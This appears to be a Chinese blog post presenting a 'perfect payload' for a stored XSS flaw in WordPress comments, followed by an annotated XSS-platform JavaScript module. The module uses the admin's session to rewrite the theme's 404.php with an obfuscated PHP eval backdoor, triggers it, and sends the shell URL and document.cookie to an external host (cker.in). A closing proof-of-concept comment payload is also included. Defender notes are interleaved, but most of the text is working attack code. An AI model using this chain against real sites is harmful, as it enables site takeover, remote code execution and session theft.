完美payload
<abbr title="qweqw style=display:block;width:9900px;position:absolute;height:9900px;top:-100px;left:-100px; onmouseover=eval(unescape(/with%28document%290%5Bbody.appendChild%28createElement%28%27script%27%29%29.src%3D%27%2f%2fcker.in%2f2oPaSh%27%5D/.source))// ">
(由于博客程序处理,截断效果的此实体字符显示不出来,“ ,https://cedricvb.be/post/wordpress-stored-xss-vulnerability-4-1-2/)
匿名评论后前台触发,覆盖全屏窗口
添加Xsser平台模块的接收参数:shell,用来接收getshell地址
xsser平台模块代码(Ajax Getshell)
// Shared mutable globals for the whole request chain below.
// A single xmlHttp object is reassigned by every request helper, so the
// GET -> POST -> GET sequence is strictly serial and relies on each
// readyState handler firing before the next createXMLHttpRequest() call.
// content404: raw HTML of wp-admin/theme-editor.php; theme/_wpnonce: hidden
// form fields scraped from it; content: the 404.php body that gets POSTed back.
var xmlHttp;var content404,theme,_wpnonce,content ;
// Assigns a fresh request object to the global xmlHttp.
// Prefers the legacy IE ActiveX control and falls back to the standard
// XMLHttpRequest. If neither exists, xmlHttp stays undefined and the
// next doRequest/doPostRequest call throws.
function createXMLHttpRequest() {
if (window.ActiveXObject) {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
}
else if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest();
}
}
// Issues an asynchronous same-origin GET for `url` and routes the result to
// handleStateChange. Because it runs inside the victim's page, the browser
// attaches the victim's WordPress session cookies, which is what lets the
// chain read wp-admin pages that the attacker could not fetch directly.
// No status code is checked anywhere in the chain; only readyState 4 is.
function doRequest(url) {
createXMLHttpRequest();
xmlHttp.onreadystatechange = handleStateChange;
xmlHttp.open("GET", url, true);
xmlHttp.send(null);
}
// Completion handler for the GET of wp-admin/theme-editor.php?file=404.php.
// 1. Scrapes the hidden `theme` and `_wpnonce` inputs from the editor form
//    (each RegExp.exec() is indexed without a null check, so a missing field
//    throws and silently ends the chain — e.g. when the user is not an admin).
// 2. Reads the current 404.php source from the editor textarea and appends a
//    PHP backdoor. The chr() sequence decodes to writing "./A.php" containing a
//    one-line eval() of a POST parameter; it is wrapped in the historical
//    <script language="php"> tag form, which PHP 7 no longer parses.
// 3. POSTs the result back through the theme editor's "update" action,
//    overwriting the theme's 404.php.
// Defender notes: the write path is the built-in file editor, so setting
// DISALLOW_FILE_EDIT in wp-config.php removes it entirely; a POST to
// wp-admin/theme-editor.php with action=update&file=404.php, followed by a
// new A.php in the web root, is the on-host and log-level indicator.
function handleStateChange() {
if(xmlHttp.readyState == 4) {
//alert(xmlHttp.responseText)
content404 = xmlHttp.responseText;
theme = new RegExp("<input type=\"hidden\" name=\"theme\" value=\"(.+?)\" />").exec(content404)[1]
_wpnonce = new RegExp("<input type=\"hidden\" id=\"_wpnonce\" name=\"_wpnonce\" value=\"(.+?)\" />").exec(content404)[1]
content = new RegExp("(:?aria-describedby=\"newcontent-description\">)([^<]+)").exec(content404)[2]+"<script language=\"php\">fputs(fopen(chr(46).chr(47).chr(65).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(97).chr(65).chr(93).chr(41).chr(59).chr(63).chr(62));</script>"
//Post code
// _wp_http_referer is taken from the current page path; the CSRF nonce is the
// one just scraped, which is why the nonce alone does not stop this flow.
var data = "_wpnonce="+_wpnonce+"&_wp_http_referer="+window.location.pathname+"&newcontent="+escape(content)+"&action=update&file=404.php&theme="+theme+"&scrollto=10&docs-list=&submit=submit"
doPostRequest("./wp-admin/theme-editor.php",data)
}
}
// Entry point: the chain starts as soon as this script is evaluated in the
// victim's page (no user interaction beyond the triggering XSS itself).
// The relative path means it only works when the page is served from the
// WordPress site root.
doRequest("./wp-admin/theme-editor.php?file=404.php")
// Sends `data` (an already URL-encoded query string) as the body of an
// asynchronous POST to `url` and routes completion to handleStateChangePost.
// No request headers are set explicitly. Like doRequest, it reuses the
// global xmlHttp and never inspects the response status.
function doPostRequest(url,data) {
createXMLHttpRequest();
xmlHttp.onreadystatechange = handleStateChangePost;
xmlHttp.open("POST", url, true);
xmlHttp.send(data);
}
// Completion handler for the theme-editor POST. Regardless of whether the
// update succeeded, it requests a post id that cannot exist so WordPress
// renders the 404 template — i.e. the freshly overwritten 404.php — which is
// what actually executes the dropper and creates A.php.
// Defender note: a 404 for an absurd ?p= value immediately after a
// theme-editor POST from the same session is a recognisable log pattern.
function handleStateChangePost() {
if(xmlHttp.readyState == 4) {
//get 404
doRequest2("./index.php?p=9999999999999998888")
}
}
// Duplicate of doRequest differing only in the completion handler
// (handleStateChange3). Same global xmlHttp, same async GET, same lack of
// status checking.
function doRequest2(url) {
createXMLHttpRequest();
xmlHttp.onreadystatechange = handleStateChange3;
xmlHttp.open("GET", url, true);
xmlHttp.send(null);
}
// Final stage: once the 404 page has been fetched, beacons to the XSS
// platform by setting an Image src. The request reports the guessed shell
// URL (origin + current path + "./A.php") and exfiltrates document.location,
// top.location, document.cookie and window.opener's URL; each read is wrapped
// in try/catch so cross-origin frame errors do not abort the beacon.
// {projectId} is a template placeholder substituted by the platform.
// Defender notes: the outbound GET to cker.in/index.php?do=api&... is the
// network indicator for this stage; cookies flagged HttpOnly do not appear in
// document.cookie and so are not exposed by this beacon; a CSP restricting
// img-src would block the exfiltration channel used here.
function handleStateChange3()
{
if(xmlHttp.readyState == 4) {
//(function(){(new Image).src="http://cker.in/index.php?do=api&id={projectId}&shell="+document.location.origin+document.location.pathname+"./A.php AAA"}())
//(function(){(new Image).src='http://cker.in/index.php?do=api&id={projectId}&shell='+escape(document.location.origin+document.location.pathname+'./A.php') })()
(function(){(new Image).src='http://cker.in/index.php?do=api&id={projectId}&shell='+escape(document.location.origin+document.location.pathname+'./A.php')+'&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})())})()
}
}
http://klikki.fi/adv/wordpress2.html
Proof of Concept
Enter as a comment text:
<a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>